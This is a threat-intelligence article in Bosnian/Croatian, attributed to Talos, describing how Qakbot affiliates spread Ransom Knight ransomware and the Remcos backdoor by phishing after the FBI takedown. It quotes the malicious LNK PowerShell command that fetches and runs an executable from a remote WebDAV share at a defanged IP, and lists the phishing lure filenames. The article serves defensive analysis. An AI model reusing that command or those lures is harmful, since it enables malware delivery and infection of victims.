- Hakeri koji stoje iza malvera Qakbot provode kampanju od početka augusta 2023. u kojoj distribuišu Ransom Knight ransomware i Remcos backdoor putem phishing emailova.
- Značajno je da je ova aktivnost počela prije nego što je FBI zaplijenio Qakbot infrastrukturu krajem avgusta i traje od tada, što ukazuje da operacija provođenja zakona možda nije uticala na infrastrukturu za isporuku neželjene pošte Qakbot operatera, već samo na njihove komandne i kontrolne (C2) servere.
- Talos je ovu novu kampanju pripisao Qakbot filijalama jer se metapodaci pronađeni u LNK datotekama korištenim u ovoj kampanji poklapaju s metapodacima sa uređaja korištenih u prethodnim Qakbot kampanjama “AA” i “BB”.
- Iako nismo vidjeli hakere koji distribuišu sam Qakbot nakon uklanjanja infrastrukture, procjenjujemo da će malver i dalje predstavljati značajnu prijetnju u budućnosti. Ovo smatramo vjerojatnim jer programeri nisu uhapšeni i još uvijek su u funkciji, otvarajući mogućnost da se odluče za obnovu Qakbot infrastrukture.
U operaciji krajem avgusta 2023. u kojoj su učestvovali FBI i mnogi međunarodni partneri, agencije za provođenje zakona zaplijenile su infrastrukturu i imovinu kriptovaluta koje koristi malver Qakbot, nanijevši znatnu štetu operacijama grupe. Mnogi ljudi u sigurnosnoj industriji pitali su se da li bi to značilo da su Qakbot podružnice zauvijek nestale ili su samo privremeno ostali bez posla dok su obnavljali svoju infrastrukturu.
Talos s umjerenim samopouzdanjem procjenjuje da su hakeri iza Qakbota i dalje aktivni i da provode novu kampanju koja je započela neposredno prije uklanjanja, distribuišući varijantu Cyclops/Ransom Knight ransomware-a zajedno sa Remcos backdoorom. Pratili smo ovu novu aktivnost povezujući metapodatke u LNK datotekama korištenim u novoj kampanji sa mašinama korištenim u prethodnim Qakbot kampanjama.
U januaru 2023. napisali smo post na blogu o korištenju metapodataka iz LNK datoteka za identifikaciju i praćenje hakera. Posebno smo detaljno opisali kako je jedna mašina korištena u kampanji “AA”, sa serijskim brojem pogona “0x2848e8a8”, kasnije korištena u kampanji za novi botnet pod nazivom “ BB ”. Nakon objave na našem blogu, primarni Qakbot hakeri odgovorni za kampanje “ AA”, “BB ” i “ Obama ” počeli su brisati metapodatke u svojim LNK datotekama kako bi otežali otkrivanje i praćenje.
Talos je u augustu 2023. identifikovao nove LNK datoteke koje su kreirane na istom stroju koji je gore referenciran, ali je primijetio da payload fajlova ukazuje na mrežni udio u komandnoj liniji koji služi varijanti Ransom Knight ransomware-a. Daljnja analiza datoteka otkrila je da ukazuju na Powershell.exe i prosljeđuju sljedeće argumente za preuzimanje sljedeće faze:
-c “istraživač ‘\\89[.]23[.]96[.]203@80\333\'”; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89[.]23[.]96[.]203@80\333\information.exe
Gornja naredba otvara Explorer.exe i pokušava pristupiti udaljenom mrežnom dijeljenju na IP 89[.]23[.]96[.]203 koristeći WebDAV na portu 80. Ova metoda može biti pokušaj da se zaobiđe detekcija komandne linije za preuzimanje udaljenog izvršnog programa preko PowerShell-a (T1105 Ingress Tool Transfer).
Nazivi ovih LNK datoteka, s temama hitnih finansijskih pitanja, sugerišu da se distribuišu u phishing e-porukama, što je u skladu s prethodnim kampanjama Qakbota:
- PAŽNJA-Račun-29-August.docx.lnk
- bankovni transfer request.lnk
- Rezervacije info.pdf.lnk
- Fattura NON pagata Agosto 2023.docx.lnk
- FRAUD bank transfer report.pdf.lnk
- faktura OTP bank.pdf.lnk
- OBAVEZNO-Račun-28-August.docx.lnk
- NOT-paid-Foice-26-August.pdf.lnk
- Nova koordinatna banka i IBAN 2023.docx.lnk
- Nova koordinatna banka i IBAN 2023.img.lnk
- Pay-Invoices-29-August.pdf.lnk
- HITNO-Račun-27-August.docx.lnk
Neki od naziva fajlova su napisani na italijanskom, što sugeriše da hakeri možda ciljaju korisnike u tom regionu. LNK datoteke se distribuišu unutar Zip arhiva koje također sadrže XLL datoteku. XLL je ekstenzija koja se koristi za Excel dodatke i dolazi sa ikonom sličnom drugim formatima Excel datoteka:
Zip sadržaj za jedan od phishing priloga.
Prema našoj analizi, ovi XLL fajlovi su Remcos backdoor koji se izvršava zajedno sa Ransom Knightom kako bi se hakerima omogućio pristup stroju nakon infekcije:
VirusTotal informacije za XLL fajl distribuisan uz Ransom Knight LNK downloader.
LNK datoteka, s druge strane, preuzima izvršnu datoteku sa udaljenog IP-a 89[.]23[.]96[.]203 prikazanu u komandnoj liniji iznad putem WebDAV-a, što je stvarni Ransom Knight teret. Ova porodica ransomwarea je ažurirana verzija Cyclops ransomware-as-a-service, prepisana od nule. Haker iza usluge Cyclops najavio je novu varijantu u maju 2023. godine:
Objava na Dark web forumu koja najavljuje Ransom Knight ransomware.
Ne vjerujemo da hakeri Qakbota stoje iza ponude ransomware-as-a-service, već su jednostavno korisnici usluge. Kako je ova nova operacija u toku od početka augusta 2023. i nije prestala nakon uklanjanja, vjerujemo da operacija FBI-a nije uticala na Qakbotovu phishing infrastrukturu za isporuku e-pošte, već samo na njegove komandne i kontrolne servere. Iako nismo vidjeli hakere koji distribuišu Qakbot post-infrastrukturno uklanjanje, procjenjujemo da će zlonamjerni softver vjerovatno nastaviti predstavljati značajnu prijetnju u budućnosti. S obzirom na to da operateri ostaju aktivni, oni mogu odlučiti obnoviti Qakbot infrastrukturu kako bi u potpunosti nastavili svoje aktivnosti prije uklanjanja.
Izvor: Talos